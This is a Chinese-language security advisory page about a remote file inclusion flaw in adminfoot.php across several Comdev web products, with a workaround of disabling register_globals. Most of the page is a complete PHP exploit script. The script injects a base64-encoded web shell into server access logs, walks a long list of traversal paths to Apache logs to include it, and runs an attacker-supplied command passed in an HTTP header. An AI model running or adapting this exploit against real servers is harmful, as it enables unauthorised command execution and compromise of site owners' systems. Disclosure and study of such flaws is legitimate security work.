首页 -> 安全研究
安全研究
安全漏洞
多个Comdev产品adminfoot.php远程文件包含漏洞
发布日期:2006-10-19
更新日期:2006-10-20
受影响系统:
Comdev Web Blogger 4.1描述:
Comdev One Admin Pro 4.1
Comdev Misc Tools 4.1
Comdev Forum 4.1
Comdev Form Designer 4.1
BUGTRAQ ID: 20566
Comdev是一家软件开发公司,提供多种商业Web组件。
多个Comdev产品在处理用户请求时存在输入验证漏洞,远程攻击者可能利用漏洞在服务器上以Web进程权限执行任意命令。
多个Comdev产品的adminfoot.php脚本没有正确过滤对path[docroot]参数的输入,允许攻击者通过包含本地或外部资源的文件执行任意PHP代码。成功攻击要求打开了register_globals。
<*来源:disfigure (disfigure@gmail.com)
w4ck1ng.com (http://www.w4cking.com/)
链接:http://secunia.com/advisories/22470/
http://marc.theaimsgroup.com/?l=bugtraq&m=116119148115646&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/php
/*********************************************************************
* Comdev One Admin 4.1 Remote Command Execution/File Inclusion Vulnerability
*
* Note:
* Requires register globals to be on, and magic quotes gpc to be off.
*
* Usage:
* php script.php [host] [path] [command]
*
* Usage Example:
* php script.php domain.com /oneadminpro/ whoami
*
* Credit:
* Synsta - Vulnerability discovery and exploit scripting
*
* File Inclusion:
* <host>/<path>/oneadmin/adminfoot.php?path[docroot]=<local/remote file>
*
* Googledork: inurl:/oneadmin/
*
* [w4ck1ng] - w4ck1ng.com
*
*********************************************************************/
if(!$argv[3 ]){
die("Usage:
php $argv[0] [host] [path] [command]\n
Usage Example:
php $argv[0] domain.com /dolphin/ whoami\n");
}
function send($host, $put){
global $data;
$conn = fsockopen( gethostbyname($host),"80" );
if(!$conn) {
die("Connection to $host failed...");
}else{
fputs($conn, $put);
}
while(!feof($conn)) {
$data .=fgets( $conn);
}
fclose($conn);
return $data;
}
$host = $argv[ 1];
$path = $argv[ 2];
$cmd = $argv[ 3];
if($argv[3]){
$shellcode = base64_decode( "PD9waHAgaWYoJF9TRVJWRVJbSFRUUF9DTURdKXsgZWNobyBjbWR4cGxzdGFydC5zaGVsbF9leGVjKHN0cmlwc2xhc2hlcygkX1NFUlZFUltIVFRQX0NNRF0pKS5jbWR4cGxlbmQ7IH0gPz4=");
$req = "GET ". $path."/oneadmin/adminfoot.php?path[docroot]=$shellcode HTTP/1.1\r\n";
$req .="Accept-Encoding: text/plain\r\n" ;
$req .="Host: ". $host."\r\n";
$req .="Connection: Close\r\n\r\n" ;
send("$host", "$req");
$logs = array("../../../../../var/log/httpd/access_log" ,
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../logs/access_log",
"../../../logs/error_log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log");
$i = 0;
foreach($logs as $value){
$logs[$i++];
$req = "GET ". $path."/oneadmin/adminfoot.php?path[docroot]=$logs[$i]%00 HTTP/1.1\r\n";
$req .="CMD: $cmd\r\n";
$req .="Accept-Encoding: text/plain\r\n" ;
$req .="Host: ". $host."\r\n";
$req .="Connection: Close\r\n\r\n" ;
send("$host", "$req");
print("Trying $logs[$i]..\n");
$adata = explode( "cmdxplstart",$data);
$bdata = explode( "cmdxplend",$adata[1 ]);
$cdata = $bdata[ 0];
if(eregi("cmdxplend", $data)){
if($cdata==NULL){
die("\nExploit succeeded but blank command received..\n");
}
die("\nExploit Succeeded!\n\nCommand Resolution:\n$cdata\n");
}
}
}
die("Exploit Failed!\n");
建议:
临时解决方法:
* 关闭register_globals。
厂商补丁:
Comdev
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.comdevweb.com/ecommerce.php
浏览次数:3246
严重程度:0(网友投票)
绿盟科技给您安全的保障